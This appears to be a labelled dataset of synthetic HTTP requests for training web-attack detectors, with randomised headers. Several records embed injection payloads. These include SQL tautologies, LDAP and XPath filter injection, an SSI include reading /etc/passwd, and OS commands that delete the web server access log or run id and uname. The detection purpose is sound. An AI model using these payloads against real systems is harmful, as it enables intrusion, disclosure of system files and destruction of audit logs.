If-Modified-Since: Tue, 16 Dec 08 14:30:43 CET
If-Unmodified-Since: Thu, 21 Jun 07 10:39:49 CET
If-Match: *
If-None-Match: "al9Ci8aqrUkjFeBH"
If-Range: "atnOO.VOMeoQPML2"
Max-Forwards: 722
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest uri=/A2lAseE/fmtkprd/sito/xrIox8.avi
Authorization: Digest nonce
Range: 1030-
Referer: http://a0fntDes.ch/isrne/lardd2/atao/femeN5/zgdldn.asmx
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/2.2 (Windows; U; Windows NT 6.1; lp-gt; rv:5.8.3) Gecko/05571430
UA-CPU: MIPS
UA-OS: Win95
Via: 0.7 237.2.190.228, 8.2 37.230.56.149:1175, HTTP/4.8 112.196.132.144
Transfer-Encoding: deflate
Upgrade: zebo/3.9
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40268
Start - Id: 37286
class: LdapInjection
POST /FlgGwinnt8UxHjU2c_.mdb? HTTP/1.1
Content-Length: 63
Content-Language: tTrane,etSlbar
Content-Encoding: compress
Content-Location: /osbioa2s/iiawy.msf
Content-MD5: ZGVndHRpaWN5bHZiamlmdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Mar 05 15:25:19 CET
Host: 95.135.162.6
Connection: close
Accept: video/*;q=0.7, video/*;q=0.1, image/*
Accept-Charset: iso-2022-jp;q=0.9, utf-7, x-mac-roman, iso-10646-ucs-2;q=0.1, windows-1255
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.0
Cache-Control: max-stale=6114
Cookie: Elan=")(targetfilter=(o=NetscapeRoot));dnb=sg&eoajpps~Ur;it=s ];access_logxAV_=r-Degrnerpfriy0;edsOp1oeG=44152;eTienufssesvy=9972408
Cookie2: $Version="215"
Date: Fri, 22 Jun 07 11:13:44 CET
ETag: "GqihKAZwpqxucDqw52"
If-Modified-Since: Fri, 15 Feb 08 01:53:00 UTC
If-Unmodified-Since: Wed, 04 Jan 06 21:14:46 CET
If-None-Match: *
If-Range: Fri, 24 Jun 05 11:11:42 CET
Max-Forwards: 7645
Pragma: no-cache
Proxy-Authorization: Digest username="txeEac"
Authorization: Digest algorithm=MD5-sess
Referer: /he2Tet.jsp
Trailer: Expect
User-Agent: e0@lKB9fTg http://www.rartor4.cz
UA-CPU: Sparc
UA-Pixels: 3751x161
Via: HTTP/7.2 16.212.1.32, 6.7 55.132.147.117, smo/4.0 www.miro.css:09
Transfer-Encoding: identity
Upgrade: hcbmpk/2.2, 6hrt/8.0, 9ynIoj/7.6, see/0.7, 8ere/1.7
X-Forwarded-For: 229.176.95.66
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ed=enull8g1r xoue 4t+h~dH &en=5mmdyhoB&Pmnlxj6Kjg=685925959

End - Id: 37286
Start - Id: 41407
class: SqlInjection
POST /riwindow.openDoewjmFhWE/jA3arytgVlgG5t8PnY4y/aA.dll? HTTP/1.0
Content-Length: 72
Content-Language: e,E,sSe9
Content-Encoding: deflate
Content-Location: /noipglz/sieior/Atro/sA4nmp/nnapetia.jpeg
Content-MD5: eWZzdE1zZWVqZTdvYUl0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Mar 05 12:53:17 UTC
Last-Modified: Sun, 11 Apr 04 07:16:14 UTC
Host: 212.18.107.36:80
Connection: ldnto
Accept: video/*;q=0.8
Accept-Charset: macintosh, utf-7;q=0.0, shift_jis;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 199.178.94.59
Cookie: J3processing-instructionS=c=rtt;meiaeond17zstg= b;d1efOhtooe=%itr3Mv2tstdindbvhi4;inz0Oet3Rmanar=r?dmed&eno;BWsDshutdownYROW4Nt=1hmhttpsNeb4a
Cookie2: $Version="59"
Date: Tue, 17 Jul 07 14:10:02 GMT
ETag: "rHeFjrsZGZRJDQJiVfX"
Expect: jeuN
From: xttrniQd@tSeAtnO.net
If-Modified-Since: Tue, 02 Sep 08 22:06:57 GMT
If-Unmodified-Since: Sun, 08 Apr 07 18:22:02 UTC
If-Match: "AZm-PJ_fLCL1_5Y"
If-None-Match: "MceWUSOt7uE07y1"
If-Range: Sun, 16 Jan 05 06:26:13 CET
Max-Forwards: 5
MIME-Version: 2.2
Pragma: la=nkeDl
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: NTLM YWllaGhlbmR0aHM0dDRlNHRhNkVhZG94aWlmY3VLYXJjbmEzZGFyZTJ0cw==
Range: 24-
Referer: http://www.dseours.st/ro75aeo.txt
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: e80CKc http://www.i5ae.org
UA-CPU: StrongARM
UA-Disp: 0223,7526,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1178x5140
Via: 1.5 158.189.65.154, 7.7 www.54se7.shtml
Transfer-Encoding: identity
Upgrade: etntne/4.1, Iossd/8.2
Warning: 883 164.170.254.130 "nAGe9a" 
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 15055892627895380
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tc6=E&eeErpbsit3l=7uneni?6n&nwenewel1='     OR  ''    =    '

End - Id: 41407
Start - Id: 43489
class: OsCommanding
GET /bD/tosPY6EEmeta/2xg7/fKXpcqxuj/aeC7J2FDz/sQcbfNRMFqAD/GK9_L7JpH/LeiOoeheoaet/allRIShttpsRp@KXNt3At/gzreplaced9utelneti/pSY5KHMFWlvphp.asmx?sdUMe=2&ouwixgElpg=41972115&tav8rpisu7ntis9=yhQp8mu&thacyb505d5hun=h&zO5m7ioyO=952889&3VfNuYg1-KS_=6947917&Asij=%3Ef&1lPZ=ho2ra6vbscriptei&cfp=67&Yperl@PZAs=018573&cisqmhnoywmm=%250arm++-f++%2Fvar%2Flog%2Fhttpd%2Faccess_log+%3B&6rv0snghnE70sr=hdPzO7wSVjKX HTTP/1.0
Host: 121.201.100.243
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic;q=0.8, iso-8859-4;q=0.3, x-mac-cyrillic;q=0.3
Accept-Encoding: *
Accept-Language: o-eOywdKe, n7a1t-Tvimd
Cache-Control: xe=lrRrrTrw
Client-ip: 56.144.145.164
Cookie: srfeaolkg=a02gMX;slH5ud=ncvr8ehiryes;mh9c3Ue=8
Cookie2: $Version="39"
Date: Sun, 05 Nov 06 24:23:10 GMT
ETag: W/"lGLw3QTcNpilMnmU"
Expect: 100-continue
From: oie3rs@dut5nl3e.uk
If-Modified-Since: Thu, 08 Jan 04 08:24:29 GMT
If-Unmodified-Since: Sat, 11 Dec 04 08:15:53 GMT
If-Match: *
If-None-Match: *
If-Range: "7yCZLPgOBjNDzS-j"
Max-Forwards: 9975
MIME-Version: 0.6
Pragma: sttaot=aia
Proxy-Authorization: NTLM b2NpT2hvcW1vN2ljcXB0Z25oZXNzbUVvN2Vpc2FFcmRBc2RuaFQ=
Authorization: NTLM NWlydmd0dWlsOXNlaWhzdHNlaWh0dGhIQXppZXNzd2ZJZW5uc2w2b3VsNWhjaQ==
Range: 4-
Referer: /xafo6/e5cIon.cfm
TE: gzip,trailers,chunked;q=0.9
Trailer: Connection
User-Agent: Mozilla/1.0 (compatible; tdosogtt; Windows NT; shg1yseen)
UA-CPU: Sparc
UA-Disp: 6546,0956,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 2941x889
Via: HTTP/8.9 www.e6o2u4l.gif:4343
Transfer-Encoding: deflate
Upgrade: rhao/3.7, yin4/4.0
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 5600215
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43489
Start - Id: 38864
class: LdapInjection
GET /sossigyTLlfgfIot7ae/uzVzUr/1esfnhcoAe/oXllbwQ_Tq/r-asW5td/elzfhenIMzeuy/OhWz1wEpassthrue9/bA7hIZ1kOtFPPfv/xGtlG6.bin?QTBYip=9905&mNl3nt4xedwefo=vgdd%29&ltamcpseeN=ntO_nwCMdSHQ&dtueect=0wydMynm&deftfionenroqe=e89QK-o2SOg&Enincdgsx=eas%29%28++++%7C%28ewa%3D*%29&at=csi1tnulleroaeE HTTP/1.1
Host: 80.84.143.73
Connection: keep-alive
Accept: video/mpeg, video/*;q=0.6
Accept-Charset: *
Accept-Encoding: compress;q=0.5, deflate;q=0.1, gzip, identity;q=0.4, deflate
Accept-Language: *;q=0.1
Cache-Control: min-fresh=531
Client-ip: 214.111.130.134
Cookie: D72BBorNA=nlbtqeiatahrm;AV9qE=cet;orumttntrrhh7et=rxaRDz
Cookie2: $Version="90"
Date: Tue, 17 Apr 07 07:41:19 CET
ETag: "PbMQvsd@O9GSQt4NCI2"
Expect: t02I
From: tdusret@b5koNnc.biz
If-Modified-Since: Sat, 17 Nov 07 16:01:50 CET
If-Unmodified-Since: Sun, 29 Jun 08 17:30:16 CET
If-Match: *
If-None-Match: "EijzNd0bPQmmndHU9"
If-Range: *
Max-Forwards: 2
MIME-Version: 1.7
Pragma: soeEi='begit'
Proxy-Authorization: Basic ZXlkNnJpYTpxRm9tZ3c=
Authorization: NTLM cm9laHJyc21tNnMzdGZsYUhvbnA0b3RUaXVlaGxyamluaDJlbFM=
Range: 317-,-056
Referer: /SbtT.exe
TE: gzip;q=0.5,gzip,deflate
Trailer: Accept-Language
User-Agent: Mozilla/8.5 (compatible; Konqueror/4.5; Open BSD i586; hegtr)
UA-CPU: MIPS
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 279x383
Via: 9.0 www.lmte.css, FTP/1.4 www.rpeii.png
Transfer-Encoding: gzip
Upgrade: rang/4.2, ntdtl/5.2, nrNyk/9.6, Phof1/9.0, mtwom/4.4
Warning: 471 27.216.46.14 "niesmisy" 
X-Forwarded-For: 187.158.7.224
X-Serial-Number: 74857144808284221
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38864
Start - Id: 37259
class: LdapInjection
GET /oauij/Lopen.jpg?seF4ceaT3sg=0860&eira=wwbde4&oeaEdabtcino=T0an+twp-a&N2rh=997&xusnoE60le=sikUhaad+perl%24-nl%3Am%29&m7ocm2eOse6dras=3311709&H-VAmnph-082U-=i8r9&e4ajkhUmCh=iF32%40dfe9te+ev&crso9hhMnmgrr3=los&T8phpKBqw=5327577&oetni5=%29++%28+%7C%28displayName%3Dhad*%29++++%28name+++%3Dhad*++++%29%28+mail%3Dhad*%29&dYvinclude6Utmpl=mt&ces=92645&4JzVBscriptDz=5957002&5Jlo=ofonfsHiooct HTTP/1.1
Host: 173.173.117.80
Connection: keep-alive
Accept: video/mpeg, video/*;q=0.1
Accept-Charset: iso-8859-2;q=0.9, windows-1252
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-stale=2585
Client-ip: 140.231.249.168
Cookie: ameiir=95799;cj=35yynhrn;2esrolep2pp=e9zdJ1i5+evs
Cookie2: $Version="99"
Date: Thu, 07 Oct 04 01:06:30 GMT
ETag: W/"bNc0uNmABEHOP3zCY98w"
Expect: nrsrt=lsau
From: tlclo@pOIec.be
If-Modified-Since: Thu, 07 Oct 04 12:39:52 CET
If-Unmodified-Since: Tue, 12 Feb 08 07:18:53 UTC
If-Match: "E8zx7-u6L.Qmx_StE7"
If-None-Match: "--1EHWyFti_apW9I"
If-Range: *
Max-Forwards: 37
MIME-Version: 9.7
Pragma: rs2='eNldide'
Proxy-Authorization: oetuts 0iernty=iio4tep
Authorization: NTLM b21oZWVlYWN1c3NleGhnd3Vzc29sYm9paHN0bGV0ZXRzMnRsZTZuaHNsYXRp
Range: 690936-,5769-,6-
Referer: /anoa/hfdSpre.php3
TE: gzip;q=0.6,chunked;q=0.1,chunked;q=0.4
Trailer: Referer
User-Agent: Mozilla/2.0 (Windows; U; Windows NT 0.8; iN-to; rv:1.5.9) Gecko/38819887
UA-CPU: 68000
UA-Disp: 785,4501,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1371x144
Via: 9.9 www.eine.html, 4.7 www.iexT.jpg, 0.0 www.eteetq3.shtml
Transfer-Encoding: gzip
Upgrade: htlt/0.4
Warning: 419 57.72.62.225 "8qea3ieagcspza3ee" 
X-Serial-Number: 4915309492060646563
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37259
Start - Id: 49232
class: XPathInjection
GET /I0ef6/th/ed/sYeEO-MkkvMf/5fXhtpassr/y8n2sEphfr.jpeg?riwuvcp5usd97o=anotdbwedA&rqSuQ=nily&ims=Ott0&l0h=05250+++or+1%3C+++++ees%2Fbericn%2FEarog%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D4%5D+++or++4026%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&iall9=ssinEtt3ynkueyep%7C&gh8Rz=pRtonl%3Fa8epzm&2img18xmlPL=a%5C HTTP/1.1
Host: www.ewcpoa.st
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: windows-1255, windows-1254
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=2652
Client-ip: 63.155.44.179
Cookie: oonEjnU=hhtpasseoeezwre;jNdexdotUzr=267656461
Cookie2: $Version="911"
Date: Wed, 24 Mar 04 11:20:07 GMT
ETag: "vpaJWhlnEKS-Lv1_1z"
Expect: eiotoeTc
From: hi2H@ura3sfneT.ch
If-Modified-Since: Fri, 26 Sep 08 07:49:30 UTC
If-Unmodified-Since: Sat, 30 Jul 05 07:09:17 UTC
If-Match: "B3dIScTW0-631oqrVre"
If-None-Match: *
If-Range: "D@9Plj7rNhFwXCgE.a"
Max-Forwards: 02
MIME-Version: 5.2
Pragma: johtk='ttQ'
Proxy-Authorization: NTLM d2NybGtuaXlhYXRpWWU4cmVIZDhkZWppaHVhdzFEY2RzYWVud3Rucm1kb2xmUkxk
Authorization: lrtk2e iuti=tps7h
Range: -364650
Referer: http://www.zner.fr/gknwqeeu/un7se/nzbc.shtml
TE: gzip;q=0.7,chunked;q=0.2
Trailer: Date
User-Agent: Mozilla/3.2 (Machintosh; U; PPC 7.7; zR-ay; rv:3.6.1) Gecko/16349875
UA-CPU: Sparc
UA-Disp: 2948,912,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 353x220
Via: 4.1 219.54.70.223, FTP/0.8 131.42.213.212
Transfer-Encoding: identity
Upgrade: 8rpe5E/5.6, tre/6.8, 6Gt/7.8, xleel/2.7
Warning: 378 www.ecns.png "easteTT0eewfrbeti3jm" 
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 2668554721639
----: ---------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49232
Start - Id: 39813
class: SSI
GET /yrnilegMusoraefcr/v1ne4utcwjsaae9l/tNZp0z1hfHvV_/sFfkjno/tepaOie9rqegi/ttyer0/DlEIC.NyH/tLpMj8ybMKdYhJIu5Tb/na8QVxUV3MIY_PtOVA/bR9XivuOZlyX6pU5AhyB.css?-E.4zPmFI.=4T2D5iiGgoW.&dll=4+iat%3Dyosa&VDIwindow.openn=iLeetsE&Te.vBA2tVV7=1cpspre&mhegtq7t=%3C%21--+%23include++virtual%3D%22%2Fetc%2Fpasswd%22++--%3E&schoap=toree1%7Eof%5C+sL&ogtullcnoJug=yno11yHu&r7nrure4nUhra69=tOk%40Z&aIij7t=c%3Ba+osSn HTTP/1.0
Host: www.qxelwacrrn.be
Connection: close
Accept: image/png, audio/basic, application/*
Accept-Charset: iso-8859-2;q=0.9, gb2312, x-mac-korean;q=0.3
Accept-Encoding: compress, deflate;q=0.5, deflate;q=0.8, compress;q=0.3
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 144.107.45.207
Cookie: d6UzeR=587728253;iircpi5img=nplU_;oeEgaatxnDnt=e1ta8|
Cookie2: $Version="9"
Date: Sun, 30 Jul 06 14:34:50 CET
ETag: W/"N3OJ9wRTHNv3uA18"
Expect: eE2cus9
From: fEkbo16t@uycIttryA.biz
If-Modified-Since: Fri, 27 Feb 04 09:56:29 UTC
If-Unmodified-Since: Thu, 30 Mar 06 11:17:16 UTC
If-Match: "5S2a5xeq29wu6Auy"
If-None-Match: *
If-Range: Sun, 29 Apr 07 13:55:12 UTC
Max-Forwards: 32
MIME-Version: 2.7
Pragma: Psish=e2susee
Proxy-Authorization: Digest username="eege"
Authorization: Digest username="oeue"
Range: 9717-347450,4-
Referer: http://aCuajia.be/g3iud/ifuq/ie8oiM/ieeuneeA.wmn
TE: chunked;q=0.7,trailers,trailers
Trailer: Connection
User-Agent: U58tatwde/6.7.3.2
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 468x7869
Via: 4.2 www.4srt.shtml, HTTP/3.4 www.hsheo.html, 1.1 www.hNahzoh.jpg
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 728 www.6meT.htm "tbadlt3aeEaT" 
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39813
Start - Id: 38148
class: LdapInjection
GET /a0IKmSR/hyf/agi/vand_/8r9eiuaooxitfqhgyhAD/oovoeeedGnu.htm?astsm7=5eItac&lpcyrea=dPH8GPsqp&yWnwfat3nrnndtu=+1autoexeccpo%7Csc&sa3blhe7g=pnmt&hdf5h=39%29%28%26%28objectClass%3Dzt5%29%28%7C%28sn%3D++n4%29%28cn%3DNoh6+++J*%29%29&seceltl0Ohere=ieuUtptf66rsao&igieotOaeaocri=hec&eipZ=6317181&d9neitilNre9oen=32562&edelaZihwatgua=euXb6n.FwA&Zdud=5lnn&ceorce5eonzap7=olEcuset HTTP/1.0
Host: 181.26.137.68
Connection: close
Accept: */*;q=0.1
Accept-Charset: euc-tw, euc-tw, x-mac-arabic;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 73.155.29.245
Cookie: E6dke_A_U=06716;betweenscript5andV7F60=430511;1N=etwtHsenel1irTc;nreo1hs=etIecgo9atCeia
Cookie2: $Version="16"
Date: Sun, 26 Jun 05 09:01:08 CET
ETag: "Ptct44HXIkgtS5In"
Expect: 100-continue
From: 7enqeIo@sjtoi.net
If-Modified-Since: Wed, 26 Apr 06 21:48:12 GMT
If-Unmodified-Since: Sat, 20 Dec 08 01:21:46 CET
If-Match: "N3cqanTivdrDhLZxH"
If-None-Match: "yE5A4_VNrFoYm_2TQ"
If-Range: Mon, 20 Sep 04 06:04:07 UTC
Max-Forwards: 7
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic YWVhbjplamVlY2hjbg==
Authorization: xct8c5 846awn=haepm
Range: 652463-080254,-92,5914-088
Referer: http://69Nem9.st/oHshnirb/OyrTla/hOi1ie.png
TE: trailers
Trailer: Proxy-Authorization
User-Agent: t4t0a (u58YVNPX)
UA-CPU: StrongARM
UA-Disp: 651,9493,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 9560x3335
Via: FTP/2.3 www.aie5e.js:0162, FTP/0.4 239.196.125.92:728
Transfer-Encoding: deflate
Upgrade: tfcsu/8.0, late/9.1, 9vp6/5.4, h2zo/6.8, hai3pl/9.2
Warning: 953 www.rhr1crat.jpeg "ndt4er0lwh7ihen2iO" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38148
Start - Id: 41994
class: SqlInjection
GET /ftU5fbayge/alhitltedULl/pxUg2HNBnUXUnOt/bgwWG@4/ndmfort/s5Cinjri/elet0/wutssebpi/eteRExiU/dv@-l4_VM9kL/1IgP.php4?a73=446637&gitenhe3onn=%27+OR+%27reicenuFmt%27+++LIKE+%27aze%2525&caca9eS=31038233&WkNm@Guznd=79097 HTTP/1.0
Host: www.behamx4.gov
Connection: close
Accept: */*
Accept-Charset: shift_jis;q=0.0, iso-8859-5;q=0.6
Accept-Encoding: 
Accept-Language: evw-glt, v8rethra-eub, o-6ro;q=0.7
Cache-Control: max-stale=291
Client-ip: 134.245.214.117
Cookie: cM7hts=zCvF;itjorcbhtinl=hKFxRblhY5y5;TNx6dTGgroup byoDC=ranOp;oneleaaoeUysetg=wTRwx-I1C;ni_aBV5@WHZE=e;dhisnessgswle=89rohb
Cookie2: $Version="419"
Date: Tue, 28 Dec 04 07:49:03 GMT
ETag: "@kad9QMXdlP@jeeYm73"
Expect: qdhiW=zajnoi;dhetiyu
From: wXro@erouh.com
If-Modified-Since: Mon, 22 Feb 10 02:29:45 UTC
If-Unmodified-Since: Sat, 30 Jan 10 01:03:29 UTC
If-Match: "TA98GTAGo2h3BA5U"
If-None-Match: "0.rygmfxAVgEQxL8B"
If-Range: "s1crwJTI9.AEah6JDC1c"
Max-Forwards: 738
MIME-Version: 0.8
Pragma: t='ocw'
Proxy-Authorization: NTLM c2U0dUNCc2F0ZUVuNWVvZ3RhTW10aWdlbGFvZXU0bUE2YWlpYw==
Authorization: WpbNtb soaipaae=aige
Range: -728027,84041-8,736156-
Referer: http://gOytaeeQ.it/geuElho9/6vrnz/nt4eeG/isewIg.conf
TE: trailers
Trailer: Accept-Charset
User-Agent: UrielinTu4/6.6
UA-CPU: StrongARM
UA-Disp: 8277,101,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 721x544
Via: 6.5 152.108.9.22:2, 2.0 221.26.68.151
Transfer-Encoding: deflate
Upgrade: tsem/9.8, icrMn/2.4
Warning: 861 www.leOkisE.js "t5dd1agosNnsneae" "Sat, 17 Apr 04 02:49:48 UTC"
X-Forwarded-For: 103.130.102.117
X-Serial-Number: 772384141
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41994
Start - Id: 36948
class: LdapInjection
PUT /Naplcbtqmy/U7qHB.C/rdzoitmclu/cnN6hsx/dwskVeAwlg/xp_hgroup bywVwhNi/eMWV6dXzqQkiDTub3Fju/wheokE@XxPs/Pk4eVm/p30.gif? HTTP/1.0
Content-Length: 193
Content-Language: 6ims,h3mT
Content-Encoding: compress
Content-Location: /aImoa/iricnhog/opesT1lp.jpeg
Content-MD5: c3dyaHR0ZmhMZWlTbHNkbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Feb 04 19:50:16 GMT
Last-Modified: Thu, 12 Mar 09 04:17:05 GMT
Host: 84.136.248.102
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: x-mac-turkish;q=0.8, x-mac-greek;q=0.3, iso-10646-ucs-2;q=0.5, cp-932, x-mac-turkish;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=0548
Client-ip: 210.150.165.208
Cookie: ff=ffWOrBDK;SVKKQ-rtB7l=i773ldbuw;etmn8n=rJOwbFVrCUv
Cookie2: $Version="3"
Date: Sat, 09 Jan 10 08:56:21 UTC
ETag: W/"IXXTS.lbD8lH1hAwQMAy"
Expect: 100-continue
From: k3lyu19i@ehrsdtSbow.biz
If-Modified-Since: Tue, 19 Apr 05 20:22:46 CET
If-Unmodified-Since: Wed, 12 May 04 05:23:44 CET
If-Match: "T8--dE@@h@NLpZJMr1W"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: rIrMa lEwr=evhe
Authorization: Basic dGhiYW4wUzM6bEV0ZHNoc3I=
Range: 707-,38-117309
Referer: http://Edeye.ch/Ssee/1peAe9hI/hlsnens/irShd.pl
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: orlze1les/3.0.8
UA-CPU: PowerPC
UA-Disp: 1845,7989,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3317x800
Via: tnonKy/7.2 www.gEticw.js
Transfer-Encoding: identity
Upgrade: 7nr/8.5, fbe/4.0
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 76.215.12.133
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lCh=")(targetfilter=(o=NetscapeRoot))&0hl5M7l=execIsin&eL2=rt&eeth9nNela=2958&r8howeufsh1=send&edenAvNlrr2tee=xHt>Utseehtpasst&rE5pgqe=N&aroedt=zWr5odd0erpslk&mwesaasliecfto=c

End - Id: 36948
Start - Id: 48329
class: XPathInjection
GET /deletevTO9updatePAxN_z22/cz/rsZXITclWhDJ/an6fZIubfZ/mg1tiirilsncoec7Eoaa/9mHtevenhrars/Kre/fxV54/sWy0/neAh.sh?bE=ye&oEte=e5eshutdownrosginsertisbhtpassi+oeno&isen=+owtl&ehomvniidikoi=5r9ejbzsw7aSyhsHla&NZuYM7YaHmW@=xo7TitGjsoo HTTP/1.0
Host: www.C6ouat.net:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: cp-932;q=0.8, iso-2022-jp
Accept-Encoding: *;q=0.7
Accept-Language: xao'] |    P   |    //user[    name/text(   ) =   '4aots
Cache-Control: max-age=3214
Client-ip: 140.115.252.253
Cookie: aihad74ktz=ctentads;b2oAoAyijnao0r=20578;3seiccn=6121;idsseeyeohy=009501;tnrbeEcmnsmu=taldneentwTs2gua
Cookie2: $Version="1"
Date: Mon, 04 Aug 08 05:34:50 GMT
ETag: "@uSSesptw@hr7uG6h"
Expect: eiLab=Usordus;re9a
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Mon, 02 Feb 04 08:14:58 GMT
If-Unmodified-Since: Thu, 05 Jan 06 02:23:19 UTC
If-Match: "WGP@QVTfmxu76Hi"
If-None-Match: *
If-Range: *
Max-Forwards: 8189
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: dneDtg c5itec=enfiila
Authorization: prriee L9Oe=uihhcs
Range: 8313-,-86247,250-55725
Referer: http://5sdps.fr/heeddh/ctfpd/fBuv0hev/Sie7h.mdb
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.1 (compatible; MSIE 1.8; Win 9x; yutl)
UA-CPU: Sparc
UA-Disp: 202,739,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 433x249
Via: FTP/3.6 www.dRuon.png:92499, hy7/6.9 155.37.24.54, 8.8 203.216.18.246
Transfer-Encoding: identity
Upgrade: ggwu/8.7, eaee/3.4, wiazc/3.1, tznuol/7.6, gfi/8.6
Warning: 589 97.236.200.85 "tutzsttjueassase" "Sat, 28 Mar 09 19:51:19 CET"
X-Forwarded-For: 190.33.188.59
X-Serial-Number: 278748120266538
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48329
Start - Id: 36862
class: LdapInjection
GET /zcuyefhelh6o/vtCeUr/efsza/logZ5u_t9HmWaccess_logG6/EiAa4qoiQeha/eNf96nlA_.hI9.jpg?Vx6G=047377&Acs4ttjngaaesu=a6-&rgWchicanfurcr=9oUyPWrnr&ifCiIolu=blnef&hcidvnh9=nm%40UBPs-7&3hs7ncatsh=f%5Dnald%3Bci+384&casuasso0=9hhtgocIaet&rns=ce&tPffuwulra=maexecaai&9Nhenhmer6f=nlrmhavingu&geidt=4 HTTP/1.1
Host: www.f6eo.be
Connection: isega
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: 
Accept-Language: r6e)(&(objectClass=   hsG*)
Cache-Control: max-age=61878
Client-ip: 119.184.144.170
Cookie: tmiHnEenpn=595956826
Date: Mon, 09 Jan 06 02:16:14 UTC
If-Unmodified-Since: Tue, 13 Jun 06 07:43:13 UTC
If-Range: "fz1gbnS_dC3mVHaw"
Max-Forwards: 067
Pragma: no-cache
Authorization: Basic aGhhZXNjOm9zQXd1c2R0
Referer: /dsY9eetn/nexh/sGold/uden/mfyweath.asp
User-Agent: Mozilla/1.5 (Machintosh; U; Mac OS X 4.5; at-it; rv:2.9.3) Gecko/46491612
Transfer-Encoding: deflate
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36862
Start - Id: 43460
class: OsCommanding
GET /iBeketo8si6/3aWBeOEYtYuT/Eh6Lrtc/erorwiwswhoeeuh.bin?Sperlfs@6L8=+++++%3B+++++echo+++%3B+++w+++++%3B+++++uname+-a+++++%3B++id HTTP/1.0
Host: 137.25.230.177:80
Connection: keep-alive
Accept: video/*, image/*
Accept-Charset: x-mac-greek, windows-1251, us-ascii;q=0.9, euc-tw
Accept-Encoding: 
Accept-Language: dx-qtbu, h-ngn9;q=0.3
Cache-Control: no-transform
Client-ip: 21.205.240.147
Cookie: ore9ae=tbtnfdCCe107n;spwodnelspata=dihF..YRzN7
Cookie2: $Version="3"
Date: Tue, 10 Oct 06 08:42:19 CET
ETag: "ovvj4GghfZC8siq34Gtg"
Expect: 8oyrtlas
From: t3bs@fsiaebtorf.it
If-Modified-Since: Fri, 15 May 09 13:44:44 UTC
If-Unmodified-Since: Fri, 03 Dec 04 20:40:27 CET
If-Match: "DoLfngbAg@dIMUqZ01a"
